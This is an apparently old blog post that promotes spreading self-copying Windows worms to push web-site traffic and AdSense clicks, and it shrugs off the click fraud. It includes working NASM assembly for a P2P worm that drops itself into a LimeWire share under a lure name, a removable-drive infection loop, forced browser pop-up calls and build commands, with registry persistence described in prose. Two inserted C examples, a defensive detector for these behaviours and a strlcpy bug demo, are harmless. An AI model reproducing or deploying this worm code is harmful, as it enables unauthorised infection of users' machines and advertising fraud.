2010/08/31

Marketing in the *new* age using virii and worms for profit

I have coded bots, worms, virii and anything I can wrap my head around;
of them all, biological worms and virii are unique. But this post is
not about biocode, I am talking about marketing with bots. I have seen
one bot that does this, but it has a stupid payload and attacks too
hard. Anyway, I am here to discuss and show how to market successfully
with a virus/worm.

I guess if this becomes a good technique the corporate greedy will
legalize coding virii and worms \0/ for business purposes o_O lol.

You may wonder why this is necessary. Well, Einstein, some of us are
programmers (aka nerds), and when we are done coding a cool project,
marketing it becomes a heck of a job, especially when everything we say
is technical. Also, when you want to make money with Google AdSense this
is a very good option. It may be considered click fraud, but hey, you
showed them and they clicked; who's to blame, the interested client or
the coder ^_^

The whole idea is: infect a system, copy self to windir. PS: most virii
and worms meant to do some sort of public announcement or activism
target consumer OSes, and the head is Windows. It doesn't mean we hate
Windows; it means that's where all the *dull* brains are and we *need*
them to know something or arise from their silent slumber.

So as I was saying, the idea is: when our child first gets to a
compatible system, in this case Windows, it must first copy itself to
the Windows directory, then maybe write a registry rule to make it run
first when the system boots, run child2 (the one in the windir) and exit
child1, which probably came from a flash drive. Now you can WinExec your
site, which in Windows fires up the default browser with the address you
supplied, and the user sees magic: hey, there's a site here, let's see.
Or they may close it, but if it keeps popping up like a TV ad they will
give in, believe me, I have studied psychology :D

You may now infect other removable drives and exes to spread around
quickly; you may also spread through p2p ^^

Here is code for a p2p worm in asm (NASM).
PS: I don't even have to show this, only a
*fool* wouldn't know how to spread hehe.

;############################
; This is in asm(NASM)      #
; compiled under OpenBSD4.6 #
;                           #
; lame p2p worm             #
;############################
[bits 32]
[global main]

[extern CopyFileA]
[extern ExitProcess]
[extern GetModuleHandleA]
[extern GetModuleFileNameA]

[segment code public use32 class='CODE']
 main:
    call [lame]
lame:
    pop     ebp
    sub  ebp, [lame]            ; w00t you don't know this << o_O

    call [ebp+GetModuleHandleA]

    push  dword [ebp+szpath]
    push  dword eax
    call  [ebp+GetModuleFileNameA]

    push  dword 0x00000000
    push  dword [ebp+fake]
    push  dword [ebp+szpath]
    call  [ebp+CopyFileA]
   
    push dword 0x00000000
    call [ebp+ExitProcess]

[segment data public use32 class='DATA']
szpath      db 0x00000000
            times 0x00000100-$+szpath db 0 ; 256d

fake      db "C:\Progra~1\LimeWire\Free Music.exe", 0

This code is fully functional but not good :(
The fake filename can be collected from many of the warez sites and
stuff like that. To compile in UNIX/Linux use
nasm -fwin32 lame_p2p.asm
./alink -oPE lame_p2p win32.lib -entry main
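From the defender's side, here is an added example (not code from this post) that flags the host behaviours described above, the self-copy into the Windows directory with a Run-key autostart and the .exe dropped under a music-like name into a P2P shared folder, in constructed log lines; the "<OP>|<path>" log format, the sample paths and the folder names matched are assumptions.

```c
#include <ctype.h>
#include <string.h>

/* Added example, not code from the post: flags the host behaviours the post
 * describes (an .exe copied into the Windows directory, a Run-key autostart
 * value, an .exe dropped into a P2P shared folder like the post's LimeWire
 * path) in constructed log lines of the form "<OP>|<path>", OP = CREATE|REGSET. */
enum { F_WINDIR = 1, F_RUNKEY = 2, F_P2P_LURE = 4, F_ALL = 7 };

/* Lower-case copy: Windows paths are case-insensitive, so match that way. */
static void lower_copy(char *dst, const char *src, size_t n) {
    size_t i;
    for (i = 0; i + 1 < n && src[i]; i++) dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

static int has_suffix(const char *s, const char *suf) {
    size_t ls = strlen(s), lf = strlen(suf);
    return ls >= lf && strcmp(s + ls - lf, suf) == 0;
}

/* Returns a bitmask of F_* flags raised by one log line. */
int classify_event(const char *line) {
    char buf[512];
    const char *path;
    int flags = 0;
    lower_copy(buf, line, sizeof buf);          /* sizeof an array, not a pointer */
    if (!(path = strchr(buf, '|'))) return 0;
    path++;
    if (strncmp(buf, "create|", 7) == 0 && has_suffix(path, ".exe")) {
        if (strncmp(path, "c:\\windows\\", 11) == 0) flags |= F_WINDIR;
        if (strstr(path, "\\limewire\\") || strstr(path, "\\shared\\")) flags |= F_P2P_LURE;
    }
    if (strncmp(buf, "regset|", 7) == 0 && strstr(path, "\\currentversion\\run\\"))
        flags |= F_RUNKEY;
    return flags;
}

/* OR of flags over a whole session; F_ALL means the full pattern was seen. */
int classify_session(const char *const *lines, size_t n) {
    int flags = 0;
    for (size_t i = 0; i < n; i++) flags |= classify_event(lines[i]);
    return flags;
}
```

A single flag is weak evidence on its own (installers write to both places legitimately); the three together within one session are what a triage rule should score.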

For alink you can download the old version and port it, or wait for
me to release my port, which has some funny errors:
alink.c:257: warning: sizeof(pointer) possibly incorrect in argument 3

This is because I am using strlcpy with a pointer as size and also I am
compiling with
cc -O2 -pipe  -Wall -Werror -Wstrict-prototypes -c alink.c

If I take off -Werror -Wstrict-prototypes everything works fine. I'll
think about releasing it like that or corrected :)
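That warning is about a real truncation bug, not a style nit. The following is an added example, not the post's alink.c: my_strlcpy is a stand-in for OpenBSD's strlcpy(3) so the block builds where libc lacks it, and the two wrappers show the size argument the compiler complained about beside the correct form.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the post's alink.c. my_strlcpy is a stand-in for
 * OpenBSD's strlcpy(3) so this builds where libc lacks it: copy at most
 * size-1 bytes, always NUL-terminate when size > 0, return strlen(src). */
size_t my_strlcpy(char *dst, const char *src, size_t size) {
    size_t n = strlen(src);
    if (size > 0) {
        size_t copy = n < size - 1 ? n : size - 1;
        memcpy(dst, src, copy);
        dst[copy] = '\0';
    }
    return n;
}

/* The pattern behind "sizeof(pointer) possibly incorrect in argument 3":
 * dst is a pointer parameter, so sizeof(dst) is 4 or 8, not the buffer size.
 * The copy is silently cut to sizeof(char *) - 1 bytes. */
size_t copy_with_pointer_sizeof(char *dst, const char *src) {
    return my_strlcpy(dst, src, sizeof(dst));   /* BUG: pointer width */
}

/* Correct form: the caller passes the destination's real capacity and
 * checks the return value for truncation. */
size_t copy_with_real_size(char *dst, size_t dstsize, const char *src) {
    return my_strlcpy(dst, src, dstsize);
}

/* Bytes actually stored by each variant for a 20-byte source. */
size_t demo_truncated_length(void) {
    char buf[64];
    copy_with_pointer_sizeof(buf, "alink.c:257: warning");
    return strlen(buf);
}

size_t demo_full_length(void) {
    char buf[64];
    size_t n = copy_with_real_size(buf, sizeof buf, "alink.c:257: warning");
    return n < sizeof buf ? strlen(buf) : 0;    /* 0 would signal truncation */
}

int main(void) {
    printf("buggy: %zu bytes, correct: %zu bytes\n",
           demo_truncated_length(), demo_full_length());
    return 0;
}
```

Dropping -Werror only hides the diagnostic; the copy stays truncated until the call site passes the real buffer size.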

Anyway, how to spread with removable drives: I have all the code but I
don't want to copy and share :( I'll share when I perfect it.

A little snippet though:

...
    mov   word [ebp+szletter], 0x00000041 ; letter 'A'

seekem:
    mov   ecx, dword [ebp+szletter]
    mov   byte [ebp+szdrv], cl       ; lol nice eh?
   
    push  dword [ebp+szdrv]
    call  [ebp+GetDriveTypeA]

    cmp   eax, DRIVE_REMOVABLE
    je    eatit                    ; All removable Drives are mine
    inc   dword [ebp+szletter]
    cmp   word [ebp+szletter], 0x0000005a ; letter 'Z'
    jg    sleep_alil               ; should be sleep drives come and
                                   ; go u know :) Update:2010/06/15
                                   ; now we sleep hehe
    jmp   seekem

sleep_alil:
    push  0x00000014 ; 20 seconds ^^
    call  [ebp+Sleep]

    jmp   seekem     ; get back to work you idio

; Heres where you infect
eatit:
...


lol cool huh

OK, so with that you get a lot of clicks and attention. I think I am
tired, I'll continue later I think :D

Oh, I forgot the WinExec hehe

    push dword 0x00000005        ; SW_SHOW
    push dword [ebp+sitename]    ; eg http://www.google.com
    call [ebp+Winexec]

   
or if you want to use ShellExecute

    push dword 0x00000005        ; SW_SHOW        hehe
    push dword 0x00000000        ; [directory]   not needed
    push dword 0x00000000        ; [parameters]  not needed
    push dword [ebp+sitename]    ; [sitename] eg http://www.google.com
    push dword 0x00000000        ;
    push dword 0x00000000        ; [hwnd]
    call [ebp+ShellExecute]


Choose your weapon. Remember that writing these creatures (our children)
is an art, so take time and don't make them hazardous.
Take them as your little army: if you have ever taken Ninjutsu lessons
from a good *master*, he trains you with discipline first, spiritually
and physically. Code with passion and you will be happy forever.

Happy hacking push that processor to the extreme :)
